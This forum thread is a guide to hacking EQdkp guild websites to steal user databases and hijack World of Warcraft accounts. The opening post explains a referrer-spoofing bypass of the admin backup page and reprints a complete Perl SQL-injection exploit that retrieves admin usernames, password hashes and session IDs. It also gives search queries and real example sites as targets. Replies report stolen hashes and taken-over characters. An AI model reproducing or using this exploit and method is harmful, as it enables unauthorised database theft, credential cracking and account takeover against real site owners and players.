How to hack EQdkp database for accounts

[StrykerMikado]

How to hack EQdkp database for accounts!

This is a follow up to http://www.mmowned.com/forums/wow-sc...l-acc-you.html with the rest of the info you need to do it yourself. In the thread the databases were provided to you and while they helped with gathering some emails, it was also spread to alot of people. So first come, first serve. This 'scam' guide will be showing you how to set up a webserver of your own to run sql injections and some spoofing to gain access to the database files.

Starting with the most important tool to get the job done and final product, Jkain, which can be obtained in the thread show in the last paragraph. After getting that, place it to the side for now. Time to get the databases we came for.

First off, we want to get Apache and set up perl on it. Apache is a webserver that you can setup on your home computer to run web files instead of uploading them to a remote server. Goto Instructions for Apache, Perl/CGI, PHP, and MySQL on Windows and follow every instruction from steps one and two to install apache and perl to work together. Even the optional perl section. Install perl to 'C:\usr\' for easier instructions.

After you complete that, you will need a referral spoofer. If you are using firefox, obtain refspoof from https://addons.mozilla.org/en-US/fir...n/4513?id=4513 Once you install that, it is time to learn the first way to gain access to the database files. If you aren't using firefox, find a program that will spoof for you and learn how to use it. It is important in the next section.

This method will only work on EQdkp 1.3.0 or 1.3.1 version of a website.
The easiest way to get a database is to spoof the address to jump straight to the admin panel where you will be "backing up" the database for yourself. Find a target website as described in the bottom of this post. In your address bar, type in the link to look like class-1 MySQL Backup/Restore Modified for EQdkp but don't press enter yet. Now goto your spoof bar if you are using the firefox and type in Kyte DKP: Permission Denied And hit spoof:. Notice that I didn't put /backup/ at the end this time. It tricks the site into thinking you are coming from /admin/ and wanting access to /admin/backup/. It believes this without having to log into the site. Now you will see a gray page allowing you to backup the mysql database. Click on the first link you can. Now select the database you wish to take. Usually it will end with dkp. That is the one you want. On the next page, find and check eqdkp_users or something similar. It has all the usernames, emails, and most importantly, the password hash we will use. Save it to wherever. Now that you have the database, use the same technique described in the other thread I linked above to find out how to gain access to thier account.

This method will only work on any Eqdkp version of a website.
Save the following code into notepad and rename the file data.pl. Put that file wherever you want, just know the address to it. Goto your start menu, run, and type in cmd. It will bring up the command prompt. Type in 'cd C:\whereever\you\put\the\file' and press enter. Now find a EQdkp site you want to gain access to. Type data.pl 'web address' in the command prompt, without the ' '. It will try to find the admin username and password hash. Usually you will either get nothing or the admin username. But if you get the name and hash, you can put the hash through Jkain to find the pass allowing you to be admin of the site. Then backup the database like before.

Code:

#!/usr/bin/perl -w

#################################################################################
#                                        #
#              EQdkp <= 1.3.2 SQL Injection Exploit            #
#                                        #
# Discovered by: Silentz                            #
# Payload: Admin Username & Hash Retrieval                    #
# Website: http://www.w4ck1ng.com                        #
#                                         #
# Vulnerable Code (listmembers.php):                        #
#                                        #
#  $sql = 'SELECT m.*, (m.member_earned-m.member_spent+m.member_adjustment)     #
#  AS member_current, member_status, r.rank_name, r.rank_hide, r.rank_prefix,     #
#  r.rank_suffix, c.class_name AS member_class, c.class_armor_type AS         #
#  armor_type, c.class_min_level AS min_level, c.class_max_level AS max_level    #
#  FROM ' . MEMBERS_TABLE . ' m, ' . MEMBER_RANKS_TABLE . ' r, ' . CLASS_TABLE     #
#  . ' c WHERE c.class_id = m.member_class_id AND (m.member_rank_id =         #
#  r.rank_id)';                                    #
#                                            #
#     if ( !empty($_GET['rank']) )                        #
#    {                                        #
#        $sql .= " AND r.rank_name='" . urldecode($_GET['rank']) . "'";        #
#    }                                        #
#                                        #
# PoC: http://victim.com/listmembers.php?show=all&rank=%2527 UNION SELECT     #
#      0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0     #
#      FROM eqdkp_users where user_id=1/*                    #
#                                         #
# Subject To: Nothing, no authentication...nada!                #
# GoogleDork: Get your own!                            #
#                                        #
# Shoutz: The entire w4ck1ng community                        #
#                                        #
#################################################################################

use LWP::UserAgent;
if (@ARGV < 1){
print "-------------------------------------------------------------------------\r\n";
print "                  EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_eqdkp.pl [PATH]\r\n\r\n";
print "[PATH] = Path where EQdkp is located\r\n\r\n";
print "e.g. w4ck1ng_eqdkp.pl http://victim.com/eqdkp/\r\n";
print "-------------------------------------------------------------------------\r\n";
print "                     http://www.w4ck1ng.com\r\n";
print "                            ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,user_password,0,NULL,NULL,0,0,0,0 FROM eqdkp_users where user_id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));

print "-------------------------------------------------------------------------\r\n";
print "                  EQdkp <= 1.3.2 SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";

if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
print "[+] Admin User : $1\n";}

else {print "\n[-] Unable to retrieve admin username..."}

if($res->content =~ /">([0-9a-fA-F]{32})<\/a><\/td>/){
print "[+] Admin Hash : $1";}

else {print "\n[-] Unable to retrieve admin hash...\n";}

$host = $ARGV[0] . "listmembers.php?show=all&rank=%2527 UNION SELECT 0,session_id,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,NULL,NULL,0,0,0,0 FROM eqdkp_sessions where session_user_id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));

if($res->content =~ /">(.*?)<\/i><\/a><\/td>/){
print "[+] Admin SessionID : $1\n";} 

else {print "\n[-] Unable to retrieve admin sessionid...he/she is not logged in!\n";}

print "-------------------------------------------------------------------------\r\n";
print "                     http://www.w4ck1ng.com\r\n";
print "                            ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";

# milw0rm.com [2007-06-04]

How to find a Eqdkp address.
Goto google and type in listmembers.php "Powered by EQdkp 1.3.2". Type 1.3.0 or 1.3.1 if you are using the spoof method. The offical forum also has a place for people to post example of thier website. You can find that here forums.eqdkp.com -> Examples EQdkp isn't just used for WoW, but other games such as the one it was intended for or FFXI.

Examples of EQdkp sites.

HTML Code:

http://kyte.pals4life.com/dkp/
http://www.eventhorizonls.net/dkp/
http://premonitionwow.com/dkp/

[morosear]

i will try this when school starts :P (using school computers hehehe)

[StrykerMikado]

BTW, for the beginning hacker, the above section about the perl files works on other website exploits that use remote sql injection. Just read the instructions in the file iteself to know how to run it.

[DeMoN]

after many hours of searching and trying the injection method i only managed to obtain 4 hashes. 3 of which i could not find a crack for an am currently waiting for milw0rm to spit back something and the 4th which cracked but had only 3 users xD...anyways the injection method you are using is around a year old or so and most servers have been patched.

as for the spoofing method i couldn't find any sites that worked with. and that exploit is extremely old as well.

-DeMoN

btw +rep for inspiring me to screw with wow kids again.

[StrykerMikado]

after many hours of searching and trying the injection method i only managed to obtain 4 hashes. 3 of which i could not find a crack for an am currently waiting for milw0rm to spit back something and the 4th which cracked but had only 3 users xD...anyways the injection method you are using is around a year old or so and most servers have been patched.

as for the spoofing method i couldn't find any sites that worked with. and that exploit is extremely old as well.

-DeMoN

btw +rep for inspiring me to screw with wow kids again.

Thanks for the +rep. Yeah it has been a learning experience mostly for me with sql injection. I've gained alot from the databases in the other thread including a T6 shaman. Wanted to figure out how to do it myself, too bad it was a tad old and bit too late.

[gibberish]

I was able to retrive a admin username , but unfortunatly not any password hash, i was using the sql injection method btw ^^

[jns1128]

After a little self research and help from this i have successfuly gotten my own Database hash files and am going to start going through them when i get home from work tonight if i get something im happpy with and i dont need anything more i will be realeasing the files here.

[SpikeeeN]

WOW MAN.. big thanks <3.. this really made my night huhu <3 +2 rep.. and you really deserv it!

[Xronis]

nice been waiting for this.

[StrykerMikado]

After a little self research and help from this i have successfuly gotten my own Database hash files and am going to start going through them when i get home from work tonight if i get something im happpy with and i dont need anything more i will be realeasing the files here.

I'm doing some research of my own infact to modify the code to output the whole database and not just the admin but im not familier with perl language so it will take a bit. I'll update the main post if i get something going.

[jns1128]

well im not going to give away my secret but i can say that there is a much easier way to do it than this. On that note i have a 6/8 t6 prot pally that i would like to know if somone could link me a email like account closeur and stuff so i can safely keep this character!

[neco]

plz help,
i tried the sql injection method but when i Type in data.pl 'web address' like data.pl Herzlich Willkommen! i didnt work i think, because every trie it will open the data.pl file and nithing else...
plz help

its my first hack so sry if i understand anything wrong^^

[SpikeeeN]

just got myself a 6/8 T6 priest on my server that i use to play on. He also got 4/5 brutal. and 2 70 alts.. 70 shammy full pvp geared. and a 70 rogue full pvp geared. But well im pretty sure he will recall it in some hours.. so i wont bother start to play on it yet. maybe after some weeks. Thanks again for this guide <3

[Hemorrhage]

Hey I think I installed everything correctly. When I use the command data.pl www.****.***
I get this:
Unable to retrieve admin username..
Unable to retrieve admin hash....
Unable to retrieve admin sessionid ... he/she is not logged in!

cant get password when he/she is nog logged on the dkps site or???:confused:

[Knutulf]

just got myself a 6/8 T6 priest on my server that i use to play on. He also got 4/5 brutal. and 2 70 alts.. 70 shammy full pvp geared. and a 70 rogue full pvp geared. But well im pretty sure he will recall it in some hours.. so i wont bother start to play on it yet. maybe after some weeks. Thanks again for this guide <3

What method did you use?